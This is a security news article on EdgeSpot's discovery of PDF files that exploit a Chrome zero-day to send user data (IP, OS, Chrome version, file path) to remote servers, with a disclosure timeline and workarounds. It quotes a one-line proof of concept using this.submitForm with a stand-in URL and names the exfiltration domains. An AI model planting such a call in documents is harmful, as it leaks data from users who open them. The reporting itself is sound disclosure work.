U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Hackers Steal Data of 4.38 Million Aflac Japan Customers|
Advertisement

Ad Placeholder

Full Width × 90

Breaking News

PDF zero-day samples harvest user data when opened in Chrome

Experts at Exploit detection service EdgeSpot detected several PDF documents that exploit a zero-day flaw in Chrome to harvest user data. Exploit detection service EdgeSpot spotted several PDF documents that exploit a zero-day vulnerability in Chrome to harvest data on users who open the files through the popular web browser. The experts initially detected the […]

malicious PDF chrome zero-day

Experts at Exploit detection service EdgeSpot detected several PDF documents that exploit a zero-day flaw in Chrome to harvest user data.

Exploit detection service EdgeSpot spotted several PDF documents that exploit a zero-day vulnerability in Chrome to harvest data on users who open the files through the popular web browser. The experts initially detected the specially-crafted PDF files in December 2018.

When a victim opens the weaponized PDF files with Chrome the document is shown to the users, while the malicious code collects user data in the background and sent it to a remote server under the control of the attackers.

The harvested data includes IP address, operating system and Chrome versions, and the full path of the PDF file on the victim’s system.

“Since late December 2018, EdgeSpot has detected multiple PDF samples in the wild which exploit a Google Chrome zero-day flaw.” reads the analysis published by EdgeSpot.

“The exploited vulnerability allows the sender of the PDF files to track the users and collect some user’s information when they use Google Chrome as a local PDF viewer.”

It is interesting to note, if the victims open the same files with Adobe Reader, nothing happens.

Experts noticed that the data is sent to the remote servers via an HTTP POST requests without requiring any user interaction. The data were sent to one of two domains burpcollaborator[.]net or readnotify[.]com.

malicious PDF chrome zero-day

One of the files analyzed by EdgeSpot, it a weaponized version of a document from Lonely Planet on the history of the Bay Islands in Honduras.

Most of the samples detected by EdgeSpot have a low detection rate on VirusTotal, at the time of writing only two antivirus products are able to detect them.

Experts analyzed the sample and found some suspicious Javascript code in stream-1, then deobfuscated the code and discovered the root is the “this.submitForm()” PDF Javascript API.

“We tested it with a minimal PoC, a simple API call like “this.submitForm(‘http://google.com/test’)” will make Google Chrome send the personal data to google.com.” states the experts.

We decided to release our finding prior to the patch because we think it’s better to give the affected users a chance to be informed/alerted of the potential risk, since the active exploits/samples are in the wild while the patch is not near away.

The experts suggest as a temporary “workaround” to use an alternative PDF reader application for viewing received PDF documents locally or disconnect computer from the Internet when open PDF documents in Chrome.

Below the timeline

  • 2018.12.26 Finding reported to Google
  • 2019.02.12 More samples were detected during the period
  • 2019.02.14 After multiple communications with the Chrome team, we were informed the issue will be landed on official Chrome in late April. Chrome team were informed about this blog post release
  • 2019.02.26 Blog post released
[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – zero-day, hacking)

[adrotate banner=”5″]

[adrotate banner=”13″]